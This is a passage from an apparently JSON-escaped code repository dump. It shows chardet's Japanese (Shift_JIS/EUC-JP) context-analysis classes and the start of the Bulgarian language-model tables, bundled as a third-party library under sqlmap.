3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3),\n(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3),\n(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5),\n(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4),\n(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5),\n(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3),\n(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4),\n(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4),\n(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4),\n(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1),\n(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0),\n(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3),\n(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0),\n(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3),\n(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3),\n(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5),\n(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4),\n(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5),\n(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3),\n(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3),\n(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3),\n(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3),\n(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4),\n(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4),\n(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2),\n(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3),\n(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3),\n(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3),\n(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3),\n(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4),\n(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3),\n(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4),\n(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3),\n(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3),\n(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4),\n(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4),\n(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3),\n(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4),\n(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4),\n(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3),\n(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4),\n(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4),\n(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4),\n(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3),\n(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2),\n(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2),\n(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3),\n(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3),\n(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5),\n(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3),\n(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4),\n(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4),\n(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4),\n(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),\n(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3),\n(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1),\n(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2),\n(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3),\n(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1),\n)\n\nclass JapaneseContextAnalysis(object):\n    NUM_OF_CATEGORY = 6\n    DONT_KNOW = -1\n    ENOUGH_REL_THRESHOLD = 100\n    MAX_REL_THRESHOLD = 1000\n    MINIMUM_DATA_THRESHOLD = 4\n\n    def __init__(self):\n        self._total_rel = None\n        self._rel_sample = None\n        self._need_to_skip_char_num = None\n        self._last_char_order = None\n        self._done = None\n        self.reset()\n\n    def reset(self):\n        self._total_rel = 0  # total sequence received\n        # category counters, each integer counts sequence in its category\n        self._rel_sample = [0] * self.NUM_OF_CATEGORY\n        # if last byte in current buffer is not the last byte of a character,\n        # we need to know how many bytes to skip in next buffer\n        self._need_to_skip_char_num = 0\n        self._last_char_order = -1  # The order of previous char\n        # If this flag is set to True, detection is done and conclusion has\n        # been made\n        self._done = False\n\n    def feed(self, byte_str, num_bytes):\n        if self._done:\n            return\n\n        # The buffer we got is byte oriented, and a character may span in more than one\n        # buffers. In case the last one or two byte in last buffer is not\n        # complete, we record how many byte needed to complete that character\n        # and skip these bytes here.  We can choose to record those bytes as\n        # well and analyse the character once it is complete, but since a\n        # character will not make much difference, by simply skipping\n        # this character will simply our logic and improve performance.\n        i = self._need_to_skip_char_num\n        while i < num_bytes:\n            order, char_len = self.get_order(byte_str[i:i + 2])\n            i += char_len\n            if i > num_bytes:\n                self._need_to_skip_char_num = i - num_bytes\n                self._last_char_order = -1\n            else:\n                if (order != -1) and (self._last_char_order != -1):\n                    self._total_rel += 1\n                    if self._total_rel > self.MAX_REL_THRESHOLD:\n                        self._done = True\n                        break\n                    self._rel_sample[jp2CharContext[self._last_char_order][order]] += 1\n                self._last_char_order = order\n\n    def got_enough_data(self):\n        return self._total_rel > self.ENOUGH_REL_THRESHOLD\n\n    def get_confidence(self):\n        # This is just one way to calculate confidence. It works well for me.\n        if self._total_rel > self.MINIMUM_DATA_THRESHOLD:\n            return (self._total_rel - self._rel_sample[0]) / self._total_rel\n        else:\n            return self.DONT_KNOW\n\n    def get_order(self, byte_str):\n        return -1, 1\n\nclass SJISContextAnalysis(JapaneseContextAnalysis):\n    def __init__(self):\n        super(SJISContextAnalysis, self).__init__()\n        self._charset_name = \"SHIFT_JIS\"\n\n    @property\n    def charset_name(self):\n        return self._charset_name\n\n    def get_order(self, byte_str):\n        if not byte_str:\n            return -1, 1\n        # find out current char's byte length\n        first_char = byte_str[0]\n        if (0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC):\n            char_len = 2\n            if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):\n                self._charset_name = \"CP932\"\n        else:\n            char_len = 1\n\n        # return its order if it is hiragana\n        if len(byte_str) > 1:\n            second_char = byte_str[1]\n            if (first_char == 202) and (0x9F <= second_char <= 0xF1):\n                return second_char - 0x9F, char_len\n\n        return -1, char_len\n\nclass EUCJPContextAnalysis(JapaneseContextAnalysis):\n    def get_order(self, byte_str):\n        if not byte_str:\n            return -1, 1\n        # find out current char's byte length\n        first_char = byte_str[0]\n        if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):\n            char_len = 2\n        elif first_char == 0x8F:\n            char_len = 3\n        else:\n            char_len = 1\n\n        # return its order if it is hiragana\n        if len(byte_str) > 1:\n            second_char = byte_str[1]\n            if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):\n                return second_char - 0xA1, char_len\n\n        return -1, char_len\n\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langbulgarianmodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# Character Mapping Table:\n# this table is modified base on win1251BulgarianCharToOrderMap, so\n# only number <64 is sure valid\n\nLatin5_BulgarianCharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82,  # 40\n110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253,  # 50\n253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71,  # 60\n116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253,  # 70\n194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,  # 80\n210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,  # 90\n 81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238,  # a0\n 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30,  # b0\n 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56,  # c0\n  1, 18,  9, 20, 11,  3, 23, 15,  2, 26, 12, 10, 14,  6,  4, 13,  # d0\n  7,  8,  5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16,  # e0\n 62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253,  # f0\n)\n\nwin1251BulgarianCharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82,  # 40\n110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253,  # 50\n253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71,  # 60\n116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253,  # 70\n206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220,  # 80\n221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229,  # 90\n 88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240,  # a0\n 73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250,  # b0\n 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30,  # c0\n 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56,  # d0\n  1, 18,  9, 20, 11,  3, 23, 15,  2, 26, 12, 10, 14,  6,  4, 13,  # e0\n  7,  8,  5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16,  # f0\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 96.9392%\n# first 1024 sequences:3.0618%\n# rest  sequences:     0.2992%\n# negative sequences:  0.0020%\nBulgarianLangModel = (\n0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,\n3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,\n0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,3,3,0,3,1,0,\n0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n3,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,1,3,2,3,3,3,3,3,3,3,3,0,3,0,0,\n0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,2,3,2,2,1,3,3,3,3,2,2,2,1,1,2,0,1,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,2,3,2,2,3,3,1,1,2,3,3,2,3,3,3,3,2,1,2,0,2,0,3,0,0,\n0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,1,3,3,3,3,3,2,3,2,3,3,3,3,3,2,3,3,1,3,0,3,0,2,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,3,1,3,3,2,3,3,3,1,3,3,2,3,2,2,2,0,0,2,0,2,0,2,0,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,\n3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,3,3,1,2,2,3,2,1,1,2,0,2,0,0,0,0